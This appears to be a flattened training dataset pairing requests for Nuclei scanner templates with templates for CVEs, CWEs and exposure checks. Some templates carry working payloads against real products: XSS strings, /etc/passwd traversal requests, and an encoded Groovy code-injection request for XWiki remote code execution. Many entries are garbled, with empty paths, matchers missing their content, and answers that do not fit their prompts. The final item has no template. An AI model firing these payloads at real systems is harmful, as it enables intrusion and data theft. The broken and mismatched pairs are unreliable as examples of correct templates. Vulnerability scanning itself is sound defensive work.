Title: Untangle Exposed Admin Signup Summary: Untangle Exposed Admin Signup. Untangle Exposed Admin Signup is exposed publicly. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: untangle-admin-setup info: name: Untangle Exposed Admin Signup author: ritikchaddha severity: medium description: Untangle Exposed Admin Signup is exposed publicly. tags: misconfig,untangle,admin,setup,vuln http: - method: GET path: - "{{BaseURL}}/setup/setup.do" matchers: - type: word words: - "<title>Setup Wizard</title>" - "java.untangle.com" part: body condition: and - type: status status: - 200
generic
medium
untangle-admin-setup
Generate a Nuclei template for CVE-2021-32648
Title: Authentication Bypass in octobercms october Summary: octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5. Vulnerability Type: Authentication Bypass Severity: high Affected Products: octobercms october Indicators: error, vulnerability detected
id: CVE-2021-32648 info: name: OctoberCMS - Account Takeover author: daffainfo severity: high description: octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5. tags: cve,cve2021,cms,octobercms,intrusive,kev,vkev,vuln http: - method: GET path: matchers: - type: dsl condition: and - method: GET path: matchers: - type: dsl - method: GET path: matchers: - type: dsl condition: and - method: GET path: matchers: - type: word words: - "october_session=" - "admin_auth=" part: header condition: and - type: status status: - 302
cve
high
CVE-2021-32648
Generate a Nuclei template for: Php Debug Bar - Exposure
Title: Php Debug Bar - Exposure Summary: Php Debug Bar - Exposure. The DebugBar integrates easily into projects and can display profiling data from any part of your application.This template detects exposed PHP Debug Bars by looking for known response bodies and the `phpdebugbar-id` in headers. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: php-debugbar-exposure info: name: Php Debug Bar - Exposure author: ritikchaddha,pdteam,DhiyaneshDk,geeknik severity: high description: The DebugBar integrates easily into projects and can display profiling data from any part of your application.This template detects exposed PHP Debug Bars by looking for known response bodies and the `phpdebugbar-id` in headers. tags: misconfig,php,phpdebug,exposure,debug,vuln http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/_debugbar/open" matchers: - type: dsl condition: or
generic
high
php-debugbar-exposure
Generate a Nuclei template for: ZyWALL FTP Service - Detect
Title: ZyWALL FTP Service - Detect Summary: ZyWALL FTP Service - Detect. ZyWALL FTP service was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: zywall-ftp-detect info: name: ZyWALL FTP Service - Detect author: pussycat0x severity: info description: ZyWALL FTP service was detected. tags: network,ftp,zywall,detect,firewall,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
zywall-ftp-detect
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: reddit info: name: Reddit User Name Information - Detect author: dwisiswant0 severity: info description: Reddit user name information check was conducted. tags: osint,osint-social,reddit,discovery http: - method: GET path: - "https://www.reddit.com/user/{{user}}/about/.json" matchers: - type: status status: - 200 - type: word words: - "total_karma" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: H3C CVM - Arbitrary File Upload
Title: H3C CVM - Arbitrary File Upload Summary: H3C CVM - Arbitrary File Upload. An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information. Vulnerability Type: Security Check Severity: critical Indicators: vulnerability detected
id: h3c-cvm-arbitrary-file-upload info: name: H3C CVM - Arbitrary File Upload author: SleepingBag945 severity: critical description: An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information. tags: h3c,lfi,instrusive,file-upload,intrusive,vuln http: - method: GET path: matchers: - type: word words: - "{{payload}}" part: body_2 - type: word words: - "Content-Type: text/html" part: header - type: status status: - 200
generic
critical
h3c-cvm-arbitrary-file-upload
Generate a Nuclei template for CVE-2023-38964
Title: Cross-Site Scripting (XSS) in creativeitem academy_lms Summary: Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: creativeitem academy_lms Indicators: error, vulnerability detected
id: CVE-2023-38964 info: name: Academy LMS 6.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: Creative Item Academy LMS 6.0 was discovered to contain a cross-site scripting (XSS) vulnerability through `query` parameter. tags: cve2023,cve,academylms,xss,creativeitem,vuln http: - method: GET path: - "{{BaseURL}}/home/courses?query="><svg+onload=alert(document.domain)>" matchers: - type: dsl condition: and
cve
medium
CVE-2023-38964
Generate a Nuclei template for CVE-2022-40843
Title: Unknown Vulnerability in tenda w15e_firmware Summary: The Tenda AC1200 V-W15Ev2 V15.11.0.10(1576) router is vulnerable to improper authorization / improper session management that allows the router login page to be bypassed. This leads to authenticated attackers having the ability to read the routers syslog.log file which contains the MD5 password of the Administrator's user account. Vulnerability Type: Unknown Vulnerability Severity: medium Affected Products: tenda w15e_firmware Indicators: error, vulnerability detected
id: CVE-2022-40843 info: name: Tenda AC1200 V-W15Ev2 - Authentication Bypass author: gy741 severity: medium description: The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. tags: cve2022,cve,tenda,auth-bypass,router,iot,vkev,vuln http: - method: GET path: matchers: - type: regex - type: word words: - "[system]" - "[error]" - "[wan1]" part: body condition: or - type: word words: - "Content-type: config/conf" part: header - type: status status: - 200
cve
medium
CVE-2022-40843
Generate a Nuclei template for: Niagara Fox Protocol Information Enumeration
Title: Niagara Fox Protocol Information Enumeration Summary: Niagara Fox Protocol Information Enumeration. Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: niagara-fox-info-enum info: name: Niagara Fox Protocol Information Enumeration author: pussycat0x severity: info description: Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium. tags: network,fox,niagara,enum,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
niagara-fox-info-enum
Generate a Nuclei template for CVE-2023-35161
Title: Vulnerability (CWE-87) in xwiki xwiki Summary: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.2-milestone-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. Vulnerability Type: Vulnerability (CWE-87) Severity: critical Affected Products: xwiki xwiki Indicators: error, vulnerability detected
id: CVE-2023-35161 info: name: XWiki >= 6.2-milestone-1 - Cross-Site Scripting author: ritikchaddha severity: medium description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.2-milestone-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. tags: cve,cve2023,xwiki,xss,vuln http: - method: GET path: - "{{BaseURL}}/xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)" - "{{BaseURL}}/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain)" matchers: - type: word words: - "javascript:alert(document.domain)" - "DeleteApplication" - "data-xwiki" part: body condition: and - type: word words: - "text/html" part: header - type: status status: - 200
cve
critical
CVE-2023-35161
Generate a Nuclei template to detect Open Redirect
Title: Open Redirect (CWE-601) Summary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. Vulnerability Type: Open Redirect Severity: high Indicators: vulnerability detected, error
id: thinkific-redirect info: name: Thinkific - Open Redirect author: Gal Nagli severity: medium description: Thinkific contains an open redirect vulnerability via the http://interact.sh URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. tags: redirect,vuln http: - method: GET path: - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh" matchers: - type: status status: - 302 - type: word words: - "<a href="http://interact.sh?kind=jwt&message=Nil+JSON+web+token"" part: body condition: or
cwe
high
CWE-601
Generate a Nuclei template for CVE-2022-24900
Title: Path Traversal in piano_led_visualizer_project piano_led_visualizer Summary: Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack. The `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Since the "malicious" parameter represents an absolute path, the result of `os.path.join` ignores the static directory completely. Hence, untrusted input is passed via the `os.path.join` call to `flask.send_file` can lead to path traversal attacks. A patch with a fix is available on the `master` branch of the GitHub repository. This can also be fixed by preventing flow of untrusted data to the vulnerable `send_file` function. In case the application logic necessiates this behaviour, one can either use the `flask.safe_join` to join untrusted paths or replace `flask.send_file` calls with `flask.send_from_directory` calls. Vulnerability Type: Path Traversal Severity: critical Affected Products: piano_led_visualizer_project piano_led_visualizer Indicators: error, vulnerability detected
id: CVE-2022-24900 info: name: Piano LED Visualizer 1.3 - Local File Inclusion author: 0x_Akoko severity: high description: Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. tags: cve2022,cve,lfi,piano,iot,oss,piano_led_visualizer_project,vuln http: - method: GET path: - "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd" matchers: - type: regex part: body - type: status status: - 200
cve
critical
CVE-2022-24900
Generate a Nuclei template for: GCP Environment Validation
Title: GCP Environment Validation Summary: GCP Environment Validation. Checks if Google Cloud CLI (gcloud) is set up and all necessary tools are installed on the environment. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: gcp-env info: name: GCP Environment Validation author: princechaddha severity: info description: Checks if Google Cloud CLI (gcloud) is set up and all necessary tools are installed on the environment. tags: cloud,devops,google,gcp,gcp-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
gcp-env
Generate a Nuclei template for: Unauthenticated Lansweeper Instance
Title: Unauthenticated Lansweeper Instance Summary: Unauthenticated Lansweeper Instance. Lansweeper Instance is exposed. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: unauthenticated-lansweeper info: name: Unauthenticated Lansweeper Instance author: divya_mudgal severity: high description: Lansweeper Instance is exposed. tags: lansweeper,unauth,misconfig,vuln http: - method: GET path: - "{{BaseURL}}/Default.aspx" matchers: - type: word words: - "Main page - Lansweeper"
generic
high
unauthenticated-lansweeper
Generate a Nuclei template for: Instant Indexing for Google Detection
Title: Instant Indexing for Google Detection Summary: Instant Indexing for Google Detection. Tags: tech, wordpress, wp-plugin Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-fast-indexing-api info: name: Instant Indexing for Google Detection author: ricardomaia severity: info description: Instant Indexing for Google Detection tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt" matchers: - type: dsl - type: regex part: body
generic
info
wordpress-fast-indexing-api
Generate a Nuclei template for: FusionAuth Exposed Admin Setup
Title: FusionAuth Exposed Admin Setup Summary: FusionAuth Exposed Admin Setup. FusionAuth Admin Setup is exposed. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: fusionauth-admin-setup info: name: FusionAuth Exposed Admin Setup author: ritikchaddha severity: high description: FusionAuth Admin Setup is exposed. tags: misconfig,fusionauth,admin,setup,vuln http: - method: GET path: - "{{BaseURL}}/admin/setup-wizard" matchers: - type: word words: - "<title>FusionAuth Setup Wizard" - "FusionAuth is now installed and running" condition: or - type: status status: - 200
generic
high
fusionauth-admin-setup
Generate a Nuclei template for: PowerChute Network Shutdown Panel - Detect
Title: PowerChute Network Shutdown Panel - Detect Summary: PowerChute Network Shutdown Panel - Detect. Tags: panel, login, powerchute Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: powerchute-network-panel info: name: PowerChute Network Shutdown Panel - Detect author: DhiyaneshDK severity: info description: PowerChute Network Shutdown Panel - Detect tags: panel,login,powerchute,detect,discovery http: - method: GET path: - "{{BaseURL}}/login" matchers: - type: word words: - "<title>PowerChute Network Shutdown</title>" part: body - type: status status: - 200
generic
info
powerchute-network-panel
Generate a Nuclei template for: Various Online Devices Detection (Network Camera)
Title: Various Online Devices Detection (Network Camera) Summary: Various Online Devices Detection (Network Camera). Network camera panel was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: network-camera-detect info: name: Various Online Devices Detection (Network Camera) author: iamthefrogy severity: info description: Network camera panel was detected. tags: iot,discovery http: - method: GET path: - "{{BaseURL}}/CgiStart?page=Single" matchers: - type: word words: - "<TITLE>Network Camera</TITLE>"
generic
info
network-camera-detect
Generate a Nuclei template for: Ruby - Privilege Escalation
Title: Ruby - Privilege Escalation Summary: Ruby - Privilege Escalation. Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: privesc-ruby info: name: Ruby - Privilege Escalation author: daffainfo severity: high description: Ruby is a dynamic, open-source programming language known for its simplicity and productivity. It is often used for web development, scripting, and software development. Ruby's elegant syntax and focus on developer happiness have made it a popular choice for building web applications and other software projects. tags: code,linux,ruby,privesc,local http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
privesc-ruby
Generate a Nuclei template for: KindEditor Security Checks
Title: KindEditor Security Checks Summary: KindEditor Security Checks. A simple workflow that runs all KindEditor related nuclei templates on a given target. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: kindeditor-workflow info: name: KindEditor Security Checks author: daffainfo severity: info description: A simple workflow that runs all KindEditor related nuclei templates on a given target. tags: unknown http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
kindeditor-workflow
Generate a Nuclei template for: Detect Springboot Mappings Actuator
Title: Detect Springboot Mappings Actuator Summary: Detect Springboot Mappings Actuator. Additional routes may be displayed Vulnerability Type: Security Check Severity: low Indicators: vulnerability detected
id: springboot-mappings info: name: Detect Springboot Mappings Actuator author: that_juan_,dwisiswant0,wdahlenb severity: low description: Additional routes may be displayed tags: springboot,exposure,misconfig,vuln http: - method: GET path: - "{{BaseURL}}/mappings" - "{{BaseURL}}/actuator/mappings" matchers: - type: word words: - "mappings" - "method" - "produces" part: body condition: and - type: word words: - "application/json" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" part: header condition: or - type: status status: - 200
generic
low
springboot-mappings
Generate a Nuclei template for CVE-2021-27856
Title: Unknown Vulnerability in fatpipeinc ipvpn_firmware and others Summary: FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 includes an account named "cmuser" that has administrative privileges and no password. Older versions of FatPipe software may also be vulnerable. The FatPipe advisory identifier for this vulnerability is FPSA002. Vulnerability Type: Unknown Vulnerability Severity: critical Affected Products: fatpipeinc ipvpn_firmware, fatpipeinc mpvpn_firmware, fatpipeinc warp_firmware Indicators: error, vulnerability detected
id: CVE-2021-27856 info: name: FatPipe WARP/IPVPN/MPVPN - Backdoor Account author: gy741 severity: critical description: FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication. tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln http: - method: GET path: matchers: - type: status status: - 200 - type: word words: - "application/json" part: header - type: word words: - ""loginRes":"success"" - ""activeUserName":"cmuser"" condition: and
cve
critical
CVE-2021-27856
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: beyondtrust-panel info: name: BeyondTrust Login Panel - Detect author: r3dg33k,nuk3s3c severity: info description: BeyondTrust login panel was detected. tags: beyondtrust,pam,panel,discovery http: - method: GET path: - "{{BaseURL}}/WebConsole/" matchers: - type: word words: - "<title>BeyondInsight</title>" part: body
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2023-36845
Title: Vulnerability (CWE-473) in juniper junos Summary: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series: * All versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S7; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3; * 23.2 versions prior to 23.2R1-S1, 23.2R2. Vulnerability Type: Vulnerability (CWE-473) Severity: critical Affected Products: juniper junos Indicators: error, vulnerability detected
id: CVE-2023-36844 info: name: Juniper Devices - Remote Code Execution author: princechaddha,ritikchaddha severity: medium description: Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev,vuln http: - method: GET path: matchers: - type: word words: - ""original_fileName":" - ""converted_fileName":" part: body_2 condition: and - type: word words: - "{{md5(string)}}" part: body_3
cve
critical
CVE-2023-36845
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: rails-database-config info: name: Ruby on Rails Database Configuration File - Detect author: pdteam,geeknik severity: high description: Ruby on Rails database configuration file was detected, which may contain database credentials. tags: config,exposure,rails,vuln http: - method: GET path: - "{{BaseURL}}/config/database.yml" matchers: - type: word words: - "adapter:" - "database:" - "production:" part: body condition: and - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2018-10738
Title: SQL Injection in nagios nagios_xi Summary: A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter. Vulnerability Type: SQL Injection Severity: high Affected Products: nagios nagios_xi Indicators: error, vulnerability detected
id: CVE-2018-10738 info: name: NagiosXI <= 5.4.12 menuaccess.php - SQL injection author: DhiyaneshDk severity: high description: A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter. tags: cve,cve2018,nagios,sqli,vuln http: - method: POST path: - "{{BaseURL}}/nagiosql/admin/menuaccess.php" matchers: - type: word words: - "{{md5(num)}}" part: body
cve
high
CVE-2018-10738
Generate a Nuclei template for CVE-2025-49844
Title: Use After Free in redis redis and others Summary: Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, trigger a use-after-free and potentially lead to remote code execution. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands. Vulnerability Type: Use After Free Severity: critical Affected Products: redis redis, lfprojects valkey Indicators: error, vulnerability detected
id: CVE-2025-49844 info: name: Redis Lua Parser < 8.2.2 - Use After Free author: pussycat0x severity: critical description: Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, trigger a use-after-free and potentially lead to remote code execution. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands. tags: cve,cve2025,js,redis,network,passive,authenticated,vuln http: - method: GET path: - "/" matchers: - type: status status: - 200
cve
critical
CVE-2025-49844
Generate a Nuclei template for CVE-2023-6623
Title: Path Traversal in wpdeveloper essential_blocks Summary: The Essential Blocks WordPress plugin before 4.4.3 does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks. Vulnerability Type: Path Traversal Severity: critical Affected Products: wpdeveloper essential_blocks Indicators: error, vulnerability detected
id: CVE-2023-6623 info: name: Essential Blocks < 4.4.3 - Local File Inclusion author: iamnoooob,rootxharsh,pdresearch,coldfish severity: critical description: Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site. tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln http: - method: GET path: - "{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}" - "{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt" matchers: - type: dsl condition: and
cve
critical
CVE-2023-6623
Generate a Nuclei template for: Minimum Administrator Group Membership Check
Title: Minimum Administrator Group Membership Check Summary: Minimum Administrator Group Membership Check. Ensure that only essential accounts are members of the Administrators group. Excess or unnecessary accounts can increase the system's vulnerability to compromise. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: admin-group-minimal info: name: Minimum Administrator Group Membership Check author: nukunga[SungHyunJeon] severity: medium description: Ensure that only essential accounts are members of the Administrators group. Excess or unnecessary accounts can increase the system's vulnerability to compromise. tags: account-management,code,windows-audit,kisa,admin-group http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
admin-group-minimal
Generate a Nuclei template for CVE-2021-44228
Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others Summary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. Vulnerability Type: Vulnerability (CWE-20) Severity: critical Affected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware Indicators: error, vulnerability detected
id: splunk-enterprise-log4j-rce info: name: Splunk Enterprise - Remote Code Execution (Apache Log4j) author: shaikhyaser severity: critical description: Splunk Enterprise is susceptible to Log4j JNDI remote code execution. Splunk Enterprise enables you to search, analyze and visualize your data to quickly act on insights from across your technology landscape. tags: cve,cve2021,rce,jndi,log4j,splunk,oast,kev,vuln http: - method: GET path: matchers: - type: word words: - "dns" part: interactsh_protocol - type: regex part: interactsh_request
cve
critical
CVE-2021-44228
Generate a Nuclei template for CVE-2024-31982
Title: Vulnerability (CWE-95) in xwiki xwiki Summary: XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki. Vulnerability Type: Vulnerability (CWE-95) Severity: critical Affected Products: xwiki xwiki Indicators: error, vulnerability detected
id: CVE-2024-31982 info: name: XWiki < 4.10.20 - Remote code execution author: ritikchaddha severity: critical description: XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki. tags: cve,cve2024,xwiki,rce,vkev,vuln http: - method: GET path: - "{{BaseURL}}/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20" - "{{BaseURL}}/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20" matchers: - type: dsl condition: and
cve
critical
CVE-2024-31982
Generate a Nuclei template for CVE-2023-6065
Title: Unknown Vulnerability in quttera quttera_web_malware_scanner Summary: The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code Vulnerability Type: Unknown Vulnerability Severity: medium Affected Products: quttera quttera_web_malware_scanner Indicators: error, vulnerability detected
id: CVE-2023-6065 info: name: Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure author: s4e-io severity: medium description: The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code tags: cve,cve2023,wp-plugin,quttera,wpscan,wordpress,vuln http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt" matchers: - type: word words: - "Website Malware Scan Report" - "Scanned Website" - "Scan type" part: body condition: and - type: word words: - "text/plain" part: header - type: status status: - 200
cve
medium
CVE-2023-6065
Generate a Nuclei template for CVE-2017-14524
Title: Vulnerability (CWE-601) in opentext documentum_administrator and others Summary: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a (1) URL in the startat parameter to xda/help/en/default.htm or (2) /%09/ (slash encoded horizontal tab slash) followed by a domain in the redirectUrl parameter to xda/component/virtuallinkconnect. Vulnerability Type: Vulnerability (CWE-601) Severity: medium Affected Products: opentext documentum_administrator, opentext documentum_webtop Indicators: error, vulnerability detected
id: CVE-2017-14524 info: name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect author: 0x_Akoko severity: medium description: OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. tags: cve2017,cve,redirect,opentext,seclists,vuln http: - method: GET path: - "{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me" matchers: - type: regex part: header
cve
medium
CVE-2017-14524
Generate a Nuclei template for CVE-2009-2100
Title: Path Traversal in joomlapraise com_projectfork Summary: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. Vulnerability Type: Path Traversal Severity: medium Affected Products: joomlapraise com_projectfork Indicators: error, vulnerability detected
